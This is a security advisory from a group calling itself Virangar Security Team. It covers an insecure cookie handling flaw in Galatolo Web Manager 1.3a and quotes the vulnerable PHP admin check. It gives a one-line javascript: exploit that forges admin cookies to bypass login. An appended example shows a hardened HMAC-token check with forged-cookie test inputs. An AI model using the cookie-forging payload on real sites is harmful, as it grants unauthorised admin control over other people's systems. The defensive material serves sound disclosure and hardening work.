Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability

############################################################################################
# #
# ...:::::Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability ::::.... #
############################################################################################

Virangar Security Team

www.virangar.net
www.virangar.ir

--------
Discovered By: virangar security team (hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-------
DESCRIPTION:
Galatolo Web Manager suffers from insecure cookie handling. When an admin login is successful, the script creates
a cookie to show the rest of the admin area that the user is already logged in. The bad thing is that the cookie doesn't
contain any password or anything alike, therefore we can craft an admin cookie and make it look like we are
logged in as a legit admin.
---
vuln code in /Admin/index.php:

// Both arguments to grado() are read straight from client-supplied cookies.
if (grado($HTTP_COOKIE_VARS["gwm_user"], $HTTP_COOKIE_VARS["gwm_pass"]) == "admin"
    || grado($HTTP_COOKIE_VARS["gwm_user"], $HTTP_COOKIE_VARS["gwm_pass"]) == "editor") {
    top();
    menu();
    echo $wellcome_admin;
    foot();
}

---
exploit:
javascript:document.cookie = "gwm_user=admin; path=/"; document.cookie = "gwm_pass=admin; path=/";
-----
now visit /admin and you can get admin access and manage the cms ;)
-------
young iranian h4ck3rz
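
A hardened alternative to the cookie check in /Admin/index.php shown above, added here as an example; it is not Galatolo Web Manager code and not from the advisory's authors. It assumes a server-side secret `AUTH_KEY` and the hypothetical helpers `issue_token()` and `role_from_token()`: the role is only accepted from a cookie value that carries a valid HMAC issued by the server after login.

```php
<?php
// Added example: hypothetical names, not Galatolo Web Manager code.
// Assumption: AUTH_KEY is a random secret kept server-side (constructed value here).
const AUTH_KEY = 'constructed-demo-key-use-32-random-bytes-in-practice';

// Call only after the password has been verified on the server.
function issue_token(string $user, string $role, int $now, int $ttl = 1800): string
{
    $payload = base64_encode(json_encode(['u' => $user, 'r' => $role, 'exp' => $now + $ttl]));
    return $payload . '.' . hash_hmac('sha256', $payload, AUTH_KEY);
}

// Returns 'admin' or 'editor' for a valid, unexpired token; null otherwise.
function role_from_token(?string $token, int $now): ?string
{
    if ($token === null || substr_count($token, '.') !== 1) {
        return null;                      // missing or malformed cookie
    }
    [$payload, $mac] = explode('.', $token);
    if (!hash_equals(hash_hmac('sha256', $payload, AUTH_KEY), $mac)) {
        return null;                      // MAC mismatch: not issued by this server
    }
    $data = json_decode(base64_decode($payload, true) ?: '', true);
    if (!is_array($data) || !isset($data['r'], $data['exp']) || $data['exp'] < $now) {
        return null;                      // undecodable or expired
    }
    return in_array($data['r'], ['admin', 'editor'], true) ? $data['r'] : null;
}

// Constructed inputs: one server-issued token, one bare client-chosen value,
// one issued token whose payload was swapped, one issued token checked after expiry.
$now    = 1700000000;
$issued = issue_token('alice', 'editor', $now);
$forged = base64_encode('{"u":"x","r":"admin","exp":9999999999}') . '.' . explode('.', $issued)[1];

foreach ([$issued, 'admin', $forged] as $cookie) {
    var_dump(role_from_token($cookie, $now));
}
var_dump(role_from_token($issued, $now + 3600));
```

In an admin page the check becomes `role_from_token($_COOKIE['gwm_auth'] ?? null, time())`, where `gwm_auth` is a hypothetical cookie name. Keeping the role in PHP's server-side `$_SESSION` after login avoids trusting cookie contents in the same way.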
